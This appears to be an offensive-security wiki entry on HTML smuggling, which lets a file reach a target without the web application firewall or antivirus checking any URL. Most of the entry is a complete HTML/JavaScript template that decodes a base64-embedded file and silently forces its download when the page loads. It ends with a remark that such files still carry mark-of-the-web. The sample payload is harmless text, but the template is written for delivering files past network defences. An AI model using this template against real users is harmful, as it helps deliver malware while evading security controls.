HTML smuggling

HTML smuggling is a way to have the target download files without the web application firewall or AV taking action on any URL (because there won’t be any). The file is usually embedded into the webpage’s JavaScript code.

Example

The sample HTML code below demonstrates HTTP smuggling. After initializing file variable with the base64-encoded file contents, host the HTML. Any client that accesses the page will automatically download the embedded file.

<html>
    <head>
        <title>HTML Smuggling</title>
    </head>
    <body>
        <p>This is all the user will see...</p>
 
        <script>
        function convertFromBase64(base64) {
            var binary_string = window.atob(base64);
            var len = binary_string.length;
            var bytes = new Uint8Array( len );
            for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
            return bytes.buffer;
        }
 
        // use `base64` to encode file contents
        var file ='VGhpcyBpcyBhIHNtdWdnbGVkIGZpbGU=';
        var data = convertFromBase64(file);
        var blob = new Blob([data], {type: 'octet/stream'});
        var fileName = 'test.txt';
 
        if(window.navigator.msSaveOrOpenBlob) window.navigator.msSaveBlob(blob,fileName);
        else {
            var a = document.createElement('a');
            document.body.appendChild(a);
            a.style = 'display: none';
            var url = window.URL.createObjectURL(blob);
            a.href = url;
            a.download = fileName;
            a.click();
            window.URL.revokeObjectURL(url);
        }
        </script>
    </body>
</html>

Downloaded file does not bypass Windows Defender / SmartScreen

Files downloaded this way will still have the mark of the web.